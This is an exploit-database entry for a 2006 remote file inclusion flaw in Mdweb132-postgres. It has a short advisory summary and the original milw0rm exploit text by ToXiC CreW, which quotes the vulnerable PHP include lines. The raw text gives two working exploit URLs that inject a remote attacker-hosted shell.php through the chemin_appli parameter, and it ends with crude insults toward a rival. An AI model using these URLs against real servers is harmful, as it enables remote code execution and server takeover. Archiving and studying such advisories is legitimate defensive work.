header-logo
Suggest Exploit
vendor:
Mdweb132-postgres
by:
ToXiC CreW
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Mdweb132-postgres
Affected Version From: Mdweb132-postgres
Affected Version To: Mdweb132-postgres
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Mdweb132-postgres: Remote File Inclusion by ToXiC CreW

Mdweb132-postgres is vulnerable to Remote File Inclusion due to the lack of proper sanitization of user-supplied input. The vulnerable code is present in the form_org.inc.php and country_insert.php files located in the /mdweb/admin/inc/organisations/ directory. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the chemin_appli parameter. This will allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Input validation should be used to prevent Remote File Inclusion attacks. All user-supplied input should be validated and filtered before being used in the application.
Source

Exploit-DB raw data:

###### ToXiC #########################
#
# Mdweb132-postgres: Remote File Inclusion by ToXiC CreW
#
#         ToXic Security Italian CreW
#            BuG FounD by Drago84
#
# Application Affect:
#                    Mdweb132-postgres
#
#
#  Sorce Code:
#                       http://jc.desconnets.free.fr/mdweb/install/windows/mdweb132-postgres-sans-installeur.zip
#
#
# Page:                
#     form_org.inc.php
#     country_insert.php
#
#
# Problem:
#
#        // Inclusion du fichier pour l'initialisation et le chargement des étiquettes de chaque champ.
#        include_once $chemin_appli."admin/inc/organisations/initLabelForm_org.inc.php";
#        // Inclusion du fichier pour l'initialisation et le chargement du code HTML des champs de saisie.
#        include_once $chemin_appli."admin/inc/organisations/initChampsForm_org.inc.php";
#        // Inclusion du fichier pour l'écriture des fonctions Javascript de contrôle de saisie.
#        include_once $chemin_appli."config/fonctions_ctrl_js.inc.php";
#
# Dir :
#      /mdweb/admin/inc/organisations/
#
#
#
# ExPloit :
#   http://www.site.com/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://sonic-banda-di-lamer.gay/shell.php?
#
#   http://www.site.com/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=http://sonic-banda-di-lamer.gay/shell.php?
#
#
#       
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########

# milw0rm.com [2006-10-23]